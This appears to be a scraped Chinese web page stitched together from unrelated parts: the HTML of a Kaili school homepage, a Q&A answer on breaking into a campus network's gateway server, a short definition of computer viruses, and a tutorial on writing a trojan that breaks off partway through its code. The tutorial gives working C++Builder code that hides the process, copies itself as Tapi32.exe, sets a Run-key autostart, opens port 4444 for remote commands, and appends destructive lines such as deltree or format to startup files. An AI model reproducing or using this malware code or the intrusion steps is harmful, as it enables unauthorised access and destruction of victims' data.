求一个学校网站首页的源代码

html

head

meta http-equiv="Content-Type" content="text/html; charset=gb2312"

meta name="generator" content="贵州省"

meta name="keywords" content="凯里一中欢迎您!"

meta name="description" content="首页"

title凯里一中 - 首页 - 凯里一中欢迎您!/title

link rel="shortcut icon" href="/images/favicon.ico"

link type="text/css" href="/Skin/Skin_1.css" rel=stylesheet

script language=javascript src="/style/YSvoid_Functions.js"/script

script language=javascript src="/style/YSvoid_Title.js"/script

body topmargin=0 leftmargin=0

center

OBJECT style="WIDTH: 965px; HEIGHT: 190px" codeBase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0 height=198 width=1000 classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 196px? HEIGHT: 100%?;PARAM NAME="_cx" VALUE="26458"PARAM NAME="_cy" VALUE="5239"PARAM NAME="FlashVars" VALUE=""PARAM NAME="Movie" VALUE="/Upload/htmledit/2008812205023787.swf"PARAM NAME="Src" VALUE="/Upload/htmledit/2008812205023787.swf"PARAM NAME="WMode" VALUE="Window"PARAM NAME="Play" VALUE="-1"PARAM NAME="Loop" VALUE="-1"PARAM NAME="Quality" VALUE="High"PARAM NAME="SAlign" VALUE=""PARAM NAME="Menu" VALUE="-1"PARAM NAME="Base" VALUE=""PARAM NAME="AllowScriptAccess" VALUE=""PARAM NAME="Scale" VALUE="ShowAll"PARAM NAME="DeviceFont" VALUE="0"PARAM NAME="EmbedMovie" VALUE="0"PARAM NAME="BGColor" VALUE=""PARAM NAME="SWRemote" VALUE=""PARAM NAME="MovieData" VALUE=""PARAM NAME="SeamlessTabbing" VALUE="1"PARAM NAME="Profile" VALUE="0"PARAM NAME="ProfileAddress" VALUE=""PARAM NAME="ProfilePort" VALUE="0"PARAM NAME="AllowNetworking" VALUE="all"PARAM NAME="AllowFullScreen" VALUE="false"

embed src='/Upload/htmledit/2008812205023787.swf' quality=high pluginspage='http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash' type='application/x-shockwave-flash' width="100%"

height=300/Upload/htmledit/2008812205023787.swf/embed/OBJECT

TABLE borderColor=#000000 cellSpacing=2 cellPadding=3 width=965 bgColor=#ffffff border=0 heihgt=""

TBODY

UL id=menuItem 99%?;

P align=centerli id='menuHome'li id='menuHomes'a href='/'span首页/span/a/li/li

li id='menuNews'a href='/News/'span学校新闻/span/a /li

li id='menuArticle'a href='/Article/'span德育之窗/span/a /li

li id='menuBaiNian'a href='/BaiNian/' title='学校简介'span学校概况/span/a /li

li id='menuxiaoyou'a href='/xiaoyou/' title='欢迎新老校友常来看看'span校友天地/span/a /li

li id='menuBuMeng'a href='/BuMeng/'span部门时讯/span/a /li

li id='menuZhaoSheng'a href='/ZhaoSheng/' title='关于考试'span招生录取/span/a /li

li id='menuJiaoYan'a href='/JiaoYan/' title='关于教学'span教研教学/span/a /li

li id='menuShiZill'a href='/ShiZill/' title='师资力量'span师资力量/span/a /li

li id='menuDown'a href='/Down/'span试题资源/span/a /li

li id='menuVideo'a href='/Video/'span一中视频/span/a /li

li id='menuPhoto'a href='/Photo/'span校园图库/span/a /li

li id='menuForum'a href='/Forum/'span论 坛/span/a /li

P/P

UL/UL

DIV/DIV

P/P

UL/UL

P/P

UL/UL

P/P

UL/UL

P/P

UL/UL

P/P

UL/UL/P/UL/TBODY

TBODY

DIV id=headFind

DIV id=headFormSPAN id=menuFind今天是：2009年5月27日 星期三 | 您现在位于：A class=h_menu href="http://172.16.1.167:81/Editor//"网站首页/A → font title='首页'首页/font/SPAN /DIV/DIV/TBODY/TABLE

DIV/DIVTBODY/TBODY/TABLE

table border=0 width="965" cellspacing=0 cellpadding=0

tr

td width=* align=center class=bg

table border=0 width='100%' cellspacing=0 cellpadding=0

tr

td align=center

!---------------------------------登陆、新闻、文章、调查、公告、搜索 开始---------------------------------

table border=0 cellspacing=0 cellpadding=0 width="100%"

tr valign=top

td width='74%' height="49"

table border=0 cellspacing=0 cellpadding=0 width='100%'

tr valign=top

tdtable width="100%" border=0 cellpadding=0 cellspacing=0

tr valign=top

td width='25%'table border=0 cellspacing=0 cellpadding=0 width='100%'

tr

td width='25%'script language="JavaScript" src="/style/YSvoid_keyboard.js" type="text/javascript"/script

table cellspacing=1 cellpadding=1 class=table_Home

TBODY

TR

TD class=td0_Home用户登陆/TD/TR

TR class=bg_td

TD align=middle

TABLE border=0 cellspacing=0 cellpadding=2

FORM name=login_frm onSubmit="return login_true()" action=/User/login.asp?action=login_chk method=post

INPUT type=hidden value=yes name=chk

INPUT type=hidden value=yes name=re_log

TBODY

TR

TD用户名:/TD

TDINPUT type=text class=username size=18 name=username maxlegth="20" title="用户名，输入正确的用户名"/TD/TR

TR

TD密 码:/TD

TDINPUT class=password type=password size=18 name=password maxlegth="20" onclick="showkeyboard('login_frm.password')" title="用软键盘输入密码，防止黑客软件记录键盘的录入信息,如不使用键盘可直接输入密码!"/TD/TR

tr

td验证码:/td

tdinput type=text class=txt name=CodeStr maxlength=4 size=4 img src='/Include/YSvoid_GetCode.asp' align=absMiddle title= '验证码，看不清楚。请点击刷新验证码！' onclick="this.src='/Include/YSvoid_GetCode.asp'"/td

/tr

tr

td height="3"/td

/tr

TR

TD align=middle colSpan=2

A href="/User/register.asp"img src="/Skin/Skin_1/main/user_login_butreg.gif" border=0 title="注册用户，点这里可以注册新用户"/A

INPUT onclick="jacascript:return login_true();" type=image src="/Skin/Skin_1/main/user_login_button.gif" align=absMiddle border=0 title="用户登陆，请输入正确的用户名、密码、验证码再登陆网站"

A style="CURSOR: help" href="/User/Getpass.asp"img src="/Skin/Skin_1/main/user_login_key.gif" border=0 title="忘记密码，点这里可以找回自己的密码"/A/TD/TR

tr

td height="3"/td

/tr

TR

TD align=middle colSpan=2A href="/User/register.asp?action=resend" alt="重新发送一次我的注册验证邮件！"发送注册邮件/A INPUT class=bg_td id=id_memery_info type=checkbox value=yes name=memery_infoLABEL id=label_memery_info for=id_memery_info alt="如选择“记住密码”登陆，以后将自动登陆本站！"记住密码/LABEL/FORM/TABLE/TD/TR/TBODY/TABLE

table border=0trtd height=3/td/tr/table/td

tr valign=top

tdtable cellspacing=1 cellpadding=2 class=Table_Home

TR

TD class=td0_Home德育之窗/TD/TR

tr class=bg_Hometd align=center

tr height=20tdB·/B a href='Article/view.asp?id=71' style="color:FF0000;" title='德育之窗标题：凯里一中德育简报[ 2009 ] 第二期 总18期

发 布 人：klyzren

浏览次数：180 人次

整理时间：2009-4-27 22:03:21' target=_blank 凯里一中德育简报[ 2009 ] 第二.../a/td/tr

tr height=20tdB·/B a href='Article/view.asp?id=64' style="color:0000FF;" title='德育之窗标题：凯里一中德育简报[ 2009 ] 第一期 总17期

发 布 人：klyzren

浏览次数：261 人次

整理时间：2009-4-10 13:10:56' target=_blank 凯里一中德育简报[ 2009 ] 第一.../a/td/tr

tr height=20tdB·/B a href='Article/view.asp?id=26' style="color:FF0000;" title='德育之窗标题：凯里一中校园文化

发 布 人：klyzren

浏览次数：1352 人次

整理时间：2008-10-6 21:33:11' target=_blank 凯里一中校园文化/a/td/tr

tr height=20tdB·/B a href='Article/view.asp?id=23' style="color:;" title='德育之窗标题：以学生为本　构建新型的师生关系

发 布 人：klyzboy

浏览次数：736 人次

整理时间：2008-9-25 9:30:50' target=_blank 以学生为本　构建新型的师生关.../a/td/tr

tr height=20tdB·/B a href='Article/view.asp?id=20' style="color:;" title='德育之窗标题：文以载道，以道育人

发 布 人：klyzboy

浏览次数：715 人次

整理时间：2008-9-24 21:59:51' target=_blank 文以载道，以道育人/a/td/tr

tr height=20tdB·/B a href='Article/view.asp?id=19' style="color:;" title='德育之窗标题：浅谈班主任工作中的德育教育

发 布 人：klyzboy

浏览次数：784 人次

整理时间：2008-9-24 21:54:46' target=_blank 浅谈班主任工作中的德育教育/a/td/tr

/td/tr

/table

table border=0trtd height=3/td/tr/table/td

/tr

/table/td

td width='1%'/td

td width='47%'table border=0 cellspacing=0 cellpadding=0 width='100%'

tr valign=top

td

table cellspacing=1 cellpadding=2 class=Table_Home

TR

TD class=td0_Home凯里一中新闻/TD/TR

tr class=bg_Hometd align=center

table border=0 width='100%'trtd align=center

table border=0 width='100%'

tr

td

script type="text/javascript"

!--

var swf_width='450'

var swf_height='282'

var files='/Upload/htmledit/2009516132544327.jpg|/Upload/htmledit/2009427215449568.jpg|/Upload/htmledit/200949173335244.jpg|/Upload/News/2008-12/2008122820595390801.jpg|/Upload/News/2008-12/2008121123323240865.jpg'

var links='News/view.asp?id=531|News/view.asp?id=507|News/view.asp?id=459|News/view.asp?id=405|News/view.asp?id=402'

var texts='学校举行各项文艺活动|“春蕾行动”暖学子|我校荣获凯里市第三届中小学生运动会高中组团体总分第...|凯里一中田径运动场落成典礼暨2008年运动会|凯里一中纪念改革开放30周年暨“一二.九”学生爱国运动...'

var TitleBgAlpha='70'

var TitleBgPosition='30'

var Tween='2'

var AutoPlayTime='120'

var WinOpen='_blank'

var TitleTextColor='0xFFFFFF'

var TitleBgColor='0x000000'

var BtnDefaultColor='0x000000'

var BtnOverColor='0x000033'

document.write('object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="'+ swf_width +'" height="'+ swf_height +'"');

document.write('param name="movie" value="/images/small/index_news.swf"param name="quality" value="high"');

document.write('param name="menu" value="false"param name=wmode value="opaque"');

document.write('param name="FlashVars" value="bcastr_file='+files+'bcastr_link='+links+'bcastr_title='+texts+'TitleBgAlpha='+ TitleBgAlpha +'TitleBgPosition='+ TitleBgPosition +'Tween='+ Tween +'AutoPlayTime='+ AutoPlayTime +'WinOpen='+ WinOpen +'TitleTextColor='+ TitleTextColor +'TitleBgColor='+ TitleBgColor +'BtnDefaultColor='+ BtnDefaultColor +'BtnOverColor='+ BtnOverColor +'');

document.write('embed src="/images/small/index_news.swf" wmode="opaque" FlashVars="bcastr_file='+files+'bcastr_link='+links+'bcastr_title='+texts+'TitleBgAlpha='+ TitleBgAlpha +'TitleBgPosition='+ TitleBgPosition +'Tween='+ Tween +'AutoPlayTime='+ AutoPlayTime +'WinOpen='+ WinOpen +'TitleTextColor='+ TitleTextColor +'TitleBgColor='+ TitleBgColor +'BtnDefaultColor='+ BtnDefaultColor +'BtnOverColor='+ BtnOverColor +' menu="false" quality="high" width="'+ swf_width +'" height="'+ swf_height +'" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /');

document.write('/object');

--

/script

/td/trtr

td

table border=0 width='100%'

tr align=center

tdtable border=0 cellspacing=0 cellpadding=0 width='100%'trtd height=20B·/B a href='News/view.asp?id=529' style="color:0000FF;" title='新闻标题：凯里一中足球特招考核成绩登记表

发 布 人：klyzren

浏览次数：146 人次

整理时间：2009-5-11 17:41:16' target=_blank凯里一中足球特招考核成绩登.../a/tr/td/table/td

tdtable border=0 cellspacing=0 cellpadding=0 width='100%'trtd height=20B·/B a href='News/view.asp?id=526' style="color:0000FF;" title='新闻标题：致校友的一封信(校庆公告一)

发 布 人：klyzren

浏览次数：170 人次

整理时间：2009-5-6 20:58:36' target=_blank致校友的一封信(校庆公告一.../a/tr/td/table/td

/tr

/table

/td

/tr

/table

/td

/tr/table

/td/tr

/table

table border=0trtd height=3/td/tr/table

/td

/tr

/table/td

/tr

/table/td

/tr

/table

/td

td width='1%'/td

td width='25%'

table border=0 cellspacing=0 cellpadding=0 width='100%'

tr valign=top

tdtable cellspacing=1 cellpadding=2 class=Table_Home

TR

TD class=td0_Home学校公告/TD/TR

tr class=bg_Hometd align=center

tr

td height=21B·/B a href='/Common/Update.asp?Action=id=7' target_blank title='公告标题：通知（关于天气）

发布时间：2008-12-23 12:49:02

点击浏览详细……'通知（关于天气）/a/td

/tr

tr

td height=21B·/B a href='/Common/Update.asp?Action=id=6' target_blank title='公告标题：致同学们的一封信

发布时间：2008-10-15 13:44:48

点击浏览详细……'致同学们的一封信/a/td

/tr

tr

td height=21B·/B a href='/Common/Update.asp?Action=id=4' target_blank title='公告标题：国庆放假通知

发布时间：2008-10-13 18:21:29

点击浏览详细……'国庆放假通知/a/td

/tr

tr

td height=21B·/B a href='/Common/Update.asp?Action=id=1' target_blank title='公告标题：凯里一中网站改版

发布时间：2008-8-4 15:48:26

点击浏览详细……'凯里一中网站改版/a/td

/tr

/td/tr

/table

table border=0trtd height=3/td/tr/table/td

/tr

tr valign=top

td width='50%'table cellspacing=1 cellpadding=2 class=Table_Home

TR

TD class=td0_Home试题资源/TD/TR

tr class=bg_Hometd align=center

tr height=20tdB·/B a href='Down/view.asp?id=47' style="color:;" title='试题资源标题：竞赛数学训练题目

发 布 人：jswei85

浏览次数：33 人次

整理时间：2009-4-13 16:40:48' target=_blank 竞赛数学训练题目/a/td/tr

tr height=20tdB·/B a href='Down/view.asp?id=45' style="color:;" title='试题资源标题：高三历史中国古代史专题复习：中国古代民族关系和对外关系人教版知识精讲

发 布 人：klyzren

浏览次数：16 人次

整理时间：2009-3-27 15:34:52' target=_blank 高三历史中国古代史专题复习：.../a/td/tr

tr height=20tdB·/B a href='Down/view.asp?id=44' style="color:;" title='试题资源标题：高二语文《兰亭集序》北京版知识精讲

发 布 人：klyzren

浏览次数：18 人次

整理时间：2009-3-27 15:32:46' target=_blank 高二语文《兰亭集序》北京版知.../a/td/tr

tr height=20tdB·/B a href='Down/view.asp?id=43' style="color:;" title='试题资源标题：高中物理热学和电学部分演示实验flash动画（下）

发 布 人：klyzren

浏览次数：134 人次

整理时间：2008-10-12 22:57:07' target=_blank 高中物理热学和电学部分演示实.../a/td/tr

tr height=20tdB·/B a href='Down/view.asp?id=42' style="color:;" title='试题资源标题：高中物理热学和电学部分演示实验flash动画(上)

发 布 人：klyzren

浏览次数：76 人次

整理时间：2008-10-12 22:46:11' target=_blank 高中物理热学和电学部分演示实.../a/td/tr

tr height=20tdB·/B a href='Down/view.asp?id=40' style="color:;" title='试题资源标题：2008年会考模拟试卷

发 布 人：klpwb

浏览次数：83 人次

整理时间：2008-10-6 23:04:22' target=_blank 2008年会考模拟试卷/a/td/tr

tr height=20tdB·/B a href='Down/view.asp?id=38' style="color:;" title='试题资源标题：地理教学FLash--洋流的形成分布及影响

发 布 人：笑红尘

浏览次数：62 人次

整理时间：2008-9-25 13:29:41' target=_blank 地理教学FLash--洋流的形成分布.../a/td/tr

tr height=20tdB·/B a href='Down/view.asp?id=37' style="color:;" title='试题资源标题：地理教学演示Flash地形雨的形成

发 布 人：笑红尘

浏览次数：35 人次

整理时间：2008-9-25 13:26:51' target=_blank 地理教学演示Flash地形雨的形成.../a/td/tr

tr height=20tdB·/B a href='Down/view.asp?id=36' style="color:;" title='试题资源标题：地理教学演示Flash

发 布 人：笑红尘

浏览次数：68 人次

整理时间：2008-9-25 13:19:31' target=_blank 地理教学演示Flash/a/td/tr

/td/tr

/table

table border=0trtd height=3/td/tr/table/td

/tr

/table

/td

/tr

tr valign=top

td height="18" colspan="3"table cellspacing=1 cellpadding=4 class=table_Home

trtd class=td_Home

TABLE cellSpacing=0 cellPadding=0 width="100%" border=0

tr

td class=dtd_Home搜索导航/td

/tr

/table

trtd class=bg_Home align=center

table border="0" cellspacing="1" cellpadding="4"

form action='/Common/search.asp' method=get onsubmit="javascript:frm_submitonce(this);"

tr

tdimg border=0 src='/Skin/Skin_1/main/ico_search.gif' align=absmiddle /td

td input type=text name=keyword value='' size=20 maxlength=20 title='多个关键字请用 空格 格开' class=bg_search/td

td

select name=sea_type

option value='news'学校新闻/option

option value='article'德育之窗/option

option value='bainian'辉煌的一中/option

option value='xiaoyou'校友天地/option

option value='bumeng'部门时讯/option

option value='zhaosheng'招生录取/option

option value='jiaoyan'教研教学/option

option value='shizill'师资力量/option

option value='down'试题资源/option

option value='video'一中视频/option

option value='photo'校园图库/option

option value='forum'交流论坛/option

/select/td

td input type=checkbox name=celerity value='yes'/td

td快速搜索 /td

td valign=topinput type=submit class=btn value='搜 索'/td

td a href='/Common/search.asp?action=help' title='多功能搜索' style='cursor:help;'搜索帮助？/a/td

/tr

/form

/table

/td/tr

/table

table border=0trtd height=3/td/tr/table/td

/tr

/table

!---------------------------------登陆、新闻、文章、调查、公告、搜索 结束---------------------------------

!---------------------------------下载、商城 开始---------------------------------

!---------------------------------论坛、电影 开始---------------------------------

!---------------------------------酷站、市场、企业 开始---------------------------------

!---------------------------------酷站、市场、企业 结束---------------------------------

!---------------------------------图库、动画 开始---------------------------------

!---------------------------------图库、动画 结束---------------------------------

!---------------------------------友情连接 开始---------------------------------

!---------------------------------友情连接 结束---------------------------------

/td

/tr

/table

/td

/tr

/table

table border=0 width="965" cellspacing=0 cellpadding=0

tr

td width=* align=center class=bg

DIV id=headFind

DIV id=headFormSPAN id=menuFind

DIV align=center

A class=h_td href="/Common/GuestBook.asp"网站留言/A -

A class=h_td href="/Common/Links.asp"友情链接/A -

A class=h_td href="/Common/Online.asp"与我在线/A -

a class=h_td href="mailto:klyzschool@qq.com"校长邮箱/a -

A class=h_td href="#top"TOP/A /DIV/SPAN/DIV/DIV

DIV id=headV2

DIV align=centerCopyright © 2006-2009 A href="http://www.klyz.cn" target=_blankBFONT face=Arialwww./FONTFONT face=Arial color=#cc3300klyz/FONTFONT face=Arial.cn/FONT/B/A All Rights Reserved.

SCRIPT language=JavaScript src="http://s127.cnzz.com/stat.php?id=1056402web_id=1056402show=pic" charset=gb2312/SCRIPT

/DIV

DIV align=centerFONT face=VerdanaFONT face=Verdana校址：贵州省凯里市文化北路30号       邮  编：556000/FONT/DIV

DIV align=center

DIV align=centerFONT face=Verdana联系电话：0855-8506108     传 真：0855-8503668/FONT/DIV/FONT/DIV

DIV align=centerA href="http://www.klyz.cn" target=_blank凯里一中版权所有/A /DIV/DIV/td

/tr

/table

/center

/body

/html

关于校园网的..会请进!!!

兄弟，这个很难的。

学校就是个大的局域网，在出口连Internet处有台服务器，上面装了一个管理软件，这个管理软件可以分配账号和设置网络服务时间，配置带宽。

你攻击入这台服务器就可以了。一般学校给你IP地址的网关地址就是这台服务器的地址。可以扫描这台服务器的漏洞，然后根据漏洞找黑客软件，攻入这台服务器，获取管理员权限后，直接接入管理软件的数据库，查找相关信息，修改之。

语言描述即使这样，但是你做了，就是违法或是违反学校制度了，小心啊，黑客不是那么难，但是小心法律的制裁。

就像破门偷东西一样容易，但是违法行为，三思而后行之。

wk_computer(星期电脑)为你解答，仅供参考。

什么是黑客?什么是电脑病毒?是怎么作的?

什么是计算机病毒

计算机病毒是一个程序，一段可执行码。就像生物病毒一样，计算机病毒有独特的复制能力。计算机病毒可以很快地蔓

延，又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时，它们就随

同文件一起蔓延开来。

除复制能力外，某些计算机病毒还有其它一些共同特性：一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎

仅仅表现在文字和图象上时，它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不

寄生于一个污染程序，它仍然能通过占据存贮空间给你带来麻烦，并降低你的计算机的全部性能。

可以从不同角度给出计算机病毒的定义。一种定义是通过磁盘、磁带和网络等作为媒介传播扩散,能“传染” 其他程序

的程序。另一种是能够实现自身复制且借助一定的载体存在的具有潜伏性、传染性和破坏性的程序。还有的定义是一种人为

制造的程序,它通过不同的途径潜伏或寄生在存储媒体（如磁盘、内存）或程序里。当某种条件或时机成熟时,它会自生复制

并传播,使计算机的资源受到不同程序的破坏等等。这些说法在某种意义上借用了生物学病毒的概念,计算机病毒同生物病毒

所相似之处是能够侵入计算机系统和网络,危害正常工作的“病原体”。它能够对计算机系统进行各种破坏,同时能够自我复

制, 具有传染性。

所以, 计算机病毒就是能够通过某种途径潜伏在计算机存储介质（或程序）里, 当达到某种条件时即被激活的具有对计

算机资源进行破坏作用的一组程序或指令集合。

参考：http://www.eduboss.com/pages/winfile/FaQ/bingdu.html

木马是如何编写的（一）

武汉 周侃

特洛依木马这个名词大家应该不陌生，自从98年“死牛崇拜”黑客小组公布Back Orifice以来，木马犹如平地上的惊雷，使在Dos??Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒，终于认识到的网络也有它邪恶的一面，一时间人心惶惶。

我那时在《电脑报》上看到一篇文章，大意是一个菜鸟被人用BO控制了，吓得整天吃不下饭、睡不着觉、上不了网，到处求救！呵呵，要知道，木马（Trojan）的历史是很悠久的：早在ATT Unix和BSD Unix十分盛行的年代，木马是由一些玩程式（主要是C）水平很高的年轻人（主要是老美）用C或Shell语言编写的，基本是用来窃取登陆主机的口令，以取得更高的权限。那时木马的主要方法是诱骗??先修改你的.profile文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件，用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的，对网络可以说很陌生。直到Win9x横空出世，尤其是WinNt的普及，大大推动了网络事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Win9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的网络安全方面可以说是一个划时代的软件。

自己编写木马，听起来很Cool是不是？！木马一定是由两部分组成??服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈??难道你还给受害者传一个1兆多的动态链接库??Msvbvm60.dll吗？

启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form，首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘，其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此，只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程（Service Process）就可以了。不过该函数的声明在Borland预先打包的头文件中没有，那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。

首先判断目标机的操作系统是Win9x还是WinNt：

{

DWORD dwVersion = GetVersion();

// 得到操作系统的版本号

if (dwVersion = 0x80000000)

// 操作系统是Win9x，不是WinNt

{

typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

file://定义RegisterServiceProcess()函数的原型

HINSTANCE hDLL;

LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL = LoadLibrary("KERNEL32");

file://加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL

lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");

file://得到RegisterServiceProcess()函数的地址

lpRegisterServiceProcess(GetCurrentProcessId(),1);

file://执行RegisterServiceProcess()函数,隐藏本进程

FreeLibrary(hDLL);

file://卸载动态链接库

}

}

这样就终于可以隐身了（害我敲了这么多代码！）。为什么要判断操作系统呢？因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。接着再将自己拷贝一份到%System%目录下，例如：C:\Windows\System，并修改注册表，以便启动时自动加载：

{

char TempPath[MAX_PATH];

file://定义一个变量

GetSystemDirectory(TempPath ,MAX_PATH);

file://TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径

SystemPath=AnsiString(TempPath);

file://格式化TempPath字符串，使之成为能供编译器使用的样式

CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);

file://将自己拷贝到%System%目录下，并改名为Tapi32.exe，伪装起来

Registry=new TRegistry;

file://定义一个TRegistry对象，准备修改注册表，这一步必不可少

Registry-RootKey=HKEY_LOCAL_MACHINE;

file://设置主键为HKEY_LOCAL_MACHINE

Registry-OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);

file://打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就创建之

try

{

file://如果以下语句发生异常，跳至catch，以避免程序崩溃

if(Registry-ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")

Registry-WriteString("crossbow",SystemPath+"\\Tapi32.exe");

file://查找是否有“crossbow”字样的键值，并且是否为拷贝的目录%System%+Tapi32.exe

file://如果不是，就写入以上键值和内容

}

catch(...)

{

file://如果有错误，什么也不做

}

}

好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32.exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

接着选中ServerSocket控件，在左边的Object Inspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。再将Port填入4444，这是木马的端口号，当然你也可以用别的。但是你要注意不要用1024以下的低端端口，因为这样不但可能会与基本网络协议使用的端口相冲突，而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错 ^_^）。你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTP Control Port）；同理TNMSMTP的25号端口也是SMTP协议的专用端口。

再选中ServerSocket控件，点击Events页，双击OnClientRead事件，敲入以下代码：

{

FILE *fp=NULL;

char * content;

int times_of_try;

char TempFile[MAX_PATH];

file://定义了一堆待会儿要用到的变量

sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());

file://在%System%下建立一个文本文件Win369.bat，作为临时文件使用

AnsiString temp=Socket-ReceiveText();

file://接收客户端（攻击者，也就是你自己）传来的数据

}

好，大门敞开了！接着就是修改目标机的各种配置了！^_^ 首先我们来修改Autoexec.bat和Config.sys吧：

{

if(temp.SubString(0,9)=="edit conf")

file://如果接受到的字符串的前9个字符是“edit conf”

{

int number=temp.Length();

file://得到字符串的长度

int file_name=atoi((temp.SubString(11,1)).c_str());

file://将第11个字符转换成integer型，存入file_name变量

file://为什么要取第11个字符，因为第10个字符是空格字符

content=(temp.SubString(12,number-11)+'\n').c_str();

file://余下的字符串将被作为写入的内容写入目标文件

FILE *fp=NULL;

char filename[20];

chmod("c:\\autoexec.bat",S_IREADS_IWRITE);

chmod("c:\\config.sys",S_IREADS_IWRITE);

file://将两个目标文件的属性改为可读可写

if(file_name==1)

sprintf(filename,"%s","c:\\autoexec.bat");

file://如果第11个字符是1,就把Autoexec.bat格式化

else if(file_name==2)

sprintf(filename,"%s","c:\\config.sys");

file://如果第11个字符是1,就把Config.sys格式化

times_of_try=0;

file://定义计数器

while(fp==NULL)

{

file://如果指针是空

fp=fopen(filename,"a+");

file://如果文件不存在，创建之；如果存在，准备在其后添加

file://如果出错，文件指针为空，这样就会重复

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已经试了100次了，仍未成功

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://跳至END处

}

}

fwrite(content,sizeof(char),strlen(content),fp);

file://写入添加的语句，例如deltree/y C:或者format/q/autotest C:，够毒吧？！

fclose(fp);

file://写完后关闭目标文件

Socket-SendText("Sucess");

file://然后发回“Success”的成功信息

}

}

上回我们讲到如何修改目标机上的启动配置文件，这回我们就来查看目标机上的目录树和文件吧，这在客户端上使用“dir”命令，跟着敲?：

{

else if(temp.SubString(0,3)=="dir")

{

file://如果前3个字符是“dir”

int Read_Num;

char * CR_LF="\n";

int attrib;

char *filename;

DIR *dir;

struct dirent *ent;

int number=temp.Length();

file://得到字符串的长度

AnsiString Dir_Name=temp.SubString(5,number-3);

file://从字符串第六个字符开始，将后面的字符存入Dir_Name变量，这是目录名

if(Dir_Name=="")

{

file://如果目录名为空

Socket-SendText("Fail By Open DIR's Name");

file://返回“Fail By Open DIR's Name”信息

goto END;

file://跳到END

}

char * dirname;

dirname=Dir_Name.c_str();

if ((dir = opendir(dirname)) == NULL)

{

file://如果打开目录出错

Socket-SendText("Fail by your DIR's name!");

file://返回“Fail By Your DIR's Name”信息

goto END;

file://跳到END

}

times_of_try=0;

while(fp==NULL)

{

file://如果指针是NULL

fp=fopen(TempFile,"w+");

file://就创建system\Win369.bat准备读和写；如果此文件已存在，则会被覆盖

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

{

file://如果已经试了100次了，仍未成功（真有耐心！）

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://并跳到END处

}

}

while ((ent = readdir(dir)) != NULL)

{

file://如果访问目标目录成功

if(*(AnsiString(dirname)).AnsiLastChar()!='\\')

file://如果最后一个字符不是“\”，证明不是根目录

